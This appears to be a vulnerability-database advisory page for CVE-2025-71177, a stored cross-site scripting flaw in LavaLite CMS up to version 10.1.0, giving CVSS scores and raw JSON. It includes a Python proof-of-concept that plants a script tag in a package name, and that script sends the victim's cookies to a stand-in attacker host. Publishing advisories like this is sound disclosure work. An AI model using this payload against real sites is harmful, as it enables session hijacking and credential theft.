Security Vulnerability Report
CVE-2025-71177 CVSS 5.4 MEDIUM

CVE-2025-71177

Published: 2026-01-23 17:16:09
Last Modified: 2026-01-29 19:06:41

Description

LavaLite CMS versions up to and including 10.1.0 contain a stored cross-site scripting vulnerability in the package creation and search functionality. Authenticated users can supply crafted HTML or JavaScript in the package Name or Description fields that is stored and later rendered without proper output encoding in package search results. When other users view search results that include the malicious package, the injected script executes in their browsers, potentially enabling session hijacking, credential theft, and unauthorized actions in the context of the victim.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:lavalite:lavalite:*:*:*:*:*:*:*:* - VULNERABLE
LavaLite CMS <= 10.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-71177 PoC - LavaLite CMS Stored XSS
# Target: LavaLite CMS <= 10.1.0
# Vulnerability: Stored XSS in package creation and search functionality

TARGET_URL = "http://target.com"  # Replace with actual target URL
LOGIN_URL = f"{TARGET_URL}/login"
PACKAGE_CREATE_URL = f"{TARGET_URL}/admin/package/store"
SEARCH_URL = f"{TARGET_URL}/admin/package/search"

# Malicious XSS payload
XSS_PAYLOAD = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'


def login(session, username, password):
    """Login to LavaLite CMS"""
    data = {
        'email': username,
        'password': password
    }
    response = session.post(LOGIN_URL, data=data)
    return response.status_code == 200


def create_malicious_package(session, name, description):
    """Create package with XSS payload in name/description fields"""
    data = {
        'name': name,
        'description': description,
        'status': 'active'
    }
    response = session.post(PACKAGE_CREATE_URL, data=data)
    return response.status_code == 200


def search_packages(session, query):
    """Trigger XSS by searching for the malicious package"""
    params = {'q': query}
    response = session.get(SEARCH_URL, params=params)
    return response.text


def main():
    session = requests.Session()

    # Step 1: Login with low-privilege account
    if not login(session, '[email protected]', 'password123'):
        print("[-] Login failed")
        return
    print("[+] Logged in successfully")

    # Step 2: Create malicious package with XSS in name field
    if create_malicious_package(session, XSS_PAYLOAD, 'Description'):
        print("[+] Malicious package created")

    # Step 3: Any user searching for packages will trigger the XSS
    result = search_packages(session, '')
    print("[+] XSS payload stored and will be triggered on search")
    print("[+] Payload: " + XSS_PAYLOAD)


if __name__ == "__main__":
    main()
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-71177",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-23T17:16:08.760",
    "lastModified": "2026-01-29T19:06:40.890",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "LavaLite CMS versions up to and including 10.1.0 contain a stored cross-site scripting vulnerability in the package creation and search functionality. Authenticated users can supply crafted HTML or JavaScript in the package Name or Description fields that is stored and later rendered without proper output encoding in package search results. When other users view search results that include the malicious package, the injected script executes in their browsers, potentially enabling session hijacking, credential theft, and unauthorized actions in the context of the victim."
      },
      {
        "lang": "es",
        "value": "Las versiones de LavaLite CMS hasta la 10.1.0 inclusive contienen una vulnerabilidad de cross-site scripting almacenado en la funcionalidad de creación y búsqueda de paquetes. Los usuarios autenticados pueden introducir HTML o JavaScript manipulado en los campos Nombre o Descripción del paquete, que se almacena y luego se renderiza sin una codificación de salida adecuada en los resultados de búsqueda de paquetes. Cuando otros usuarios ven los resultados de búsqueda que incluyen el paquete malicioso, el script inyectado se ejecuta en sus navegadores, lo que podría permitir el secuestro de sesión, el robo de credenciales y acciones no autorizadas en el contexto de la víctima."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 5.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "PASSIVE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "LOW",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:lavalite:lavalite:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "10.1.0",
                "matchCriteriaId": "0B3A665F-D2AC-4FC2-83D1-D51F6F5B2312"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/LavaLite/cms/issues/420",
        "source": "[email protected]",
        "tags": ["Exploit", "Issue Tracking"]
      },
      {
        "url": "https://lavalite.org/",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://www.vulncheck.com/advisories/lavalite-cms-stored-xss-via-package-creation-and-search",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}
```